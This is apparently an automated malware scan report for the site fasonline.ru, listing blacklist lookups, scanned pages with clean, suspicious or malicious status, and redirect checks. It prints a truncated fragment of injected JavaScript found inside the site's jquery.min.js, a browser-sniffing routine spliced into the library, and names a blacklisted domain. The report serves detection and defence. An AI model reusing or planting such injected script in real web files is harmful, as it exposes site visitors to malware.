Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fasonline.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fasonline.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.fasonline.ru/ | 200 OK Content-Length: 18179 Content-Type: text/html | clean |
http://www.fasonline.ru/template/common/js/jquery.min.js | 200 OK Content-Length: 78029 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox/1 e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21412 Content-Type: text/javascript | clean |
http://www.fasonline.ru/72/misc/content.html | 200 OK Content-Length: 26380 Content-Type: text/html | clean |
http://www.fasonline.ru/archiv | 200 OK Content-Length: 30821 Content-Type: text/html | clean |
http://www.fasonline.ru/71/misc/content.html | 200 OK Content-Length: 22810 Content-Type: text/html | clean |
http://www.fasonline.ru/subscribe | 200 OK Content-Length: 13539 Content-Type: text/html | clean |
http://www.fasonline.ru/pochemu.html | 200 OK Content-Length: 13941 Content-Type: text/html | clean |
http://www.fasonline.ru/obschenie.html | 200 OK Content-Length: 13687 Content-Type: text/html | clean |
http://www.fasonline.ru/71/999669902.html | 200 OK Content-Length: 15290 Content-Type: text/html | clean |
http://www.fasonline.ru/70/misc/content.html | 200 OK Content-Length: 29735 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: margalit.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- подклÑÑение Ñайла заголовков --> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="content-language" content="ru" /> <meta name="keywords" content="" /> <meta name="description" c ...[4363 bytes skipped]... | ||
http://www.fasonline.ru/70/997783903.html | 200 OK Content-Length: 18418 Content-Type: text/html | clean |
http://www.fasonline.ru/70/997782796.html | 200 OK Content-Length: 18504 Content-Type: text/html | clean |
http://www.fasonline.ru/70/997702848.html | 200 OK Content-Length: 21269 Content-Type: text/html | clean |
http://www.fasonline.ru/70/997702462.html | 200 OK Content-Length: 18383 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fasonline.ru
Result:
GET / HTTP/1.1
Host: fasonline.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: fasonline.ru
Referer: http://www.google.com/search?q=fasonline.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fasonline.ru
Referer: http://www.google.com/search?q=fasonline.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.